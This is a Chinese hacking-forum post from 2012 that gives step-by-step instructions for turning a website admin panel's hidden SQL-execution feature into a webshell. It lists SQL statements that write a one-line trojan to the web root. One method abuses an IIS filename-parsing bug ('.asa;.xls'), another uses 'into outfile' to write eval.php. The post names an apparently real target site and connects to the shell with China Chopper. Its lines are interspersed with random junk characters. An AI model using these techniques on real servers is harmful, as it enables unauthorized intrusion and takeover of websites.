好不容易进了后台,发现啥上传啊。备份啊多木有。
' e) K0 u' |% F- a7 twebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的: _8 P! _3 i* _ s6 M+ A/ q! n
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,3 ]- ]$ w" t/ O( j# o& w
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:& L2 Q$ ?; L! |# A* K( }: l
1.create table cmd (a varchar(50))
# u8 s# m( s4 q/ M2.insert into cmd (a) values (‘‘)& v2 G; X' q) t% @( S$ o
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
/ D, c. n4 X( |4 ` J9 d: Z0 o(把表cmd的内容导出为物理路径的一个EXCEL文件)
1 w% G9 G$ f0 H4.drop table cmd a0 N8 s: B d% X, A* c. i
利用IIS的BUG成功拿到了WEBSHELL。( E2 J+ X- s \- ?; _! u
5 ^2 d: O: C5 r* n; s
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
7 L* s, g+ f1 E! a5 u! n, ~4 I \7 J! x5 \$ z+ n' t8 s0 N. @
SQL语句意思解释:) d+ W5 x% G! ^! J+ c1 L3 e
第一句$ I9 l: V2 G* r7 g
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
) A" g) K! s2 {! |8 M( q. F+ H0 L
5 B" ?$ @$ M+ G3 I: ]( L 第二句% i7 X2 J c4 J' J, l3 Q
在表cmd的a字段插入一句话木马
8 T0 n5 q# |+ J( _7 ~1 o2 ~ 第三句3 f' {4 R9 D& F+ x) u' @$ S7 x9 ^* Z4 {
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件/ u! C6 R$ V, \: f5 J
( o$ q1 P& g/ n ?( k. Y( |$ _
第四句
8 {2 @, Z9 P- G8 b4 q 删除建立的cmd表
5 B8 H. k# E- L; N0 u; }. u, \5 V( }7 P6 a/ J
以下内容为测试:1 d! `( i) a$ \
Access利用后台SQL执行命令功能导出WebShell:) V3 H& X/ X) J3 E* k* |8 f
这个更简单:
0 G/ u, C, z+ w- X/ x( M [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
8 b( I2 k A, Q* d 或者- U, f+ F. N& P1 X) e
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
' ?5 S& {. A; t5 {- E2 _( D. s# b1 C+ Y' H; s0 ~9 v
后台有执行SQL语句功能(vote为已知表段)
5 J- ]" ^: H8 ]/ j 希望对大家有所帮助拿shell的又一个思路5 X3 f8 X0 v4 R' Z% O5 p7 m/ c
|
发表于 2012-9-13 17:53:58
收藏
支持
反对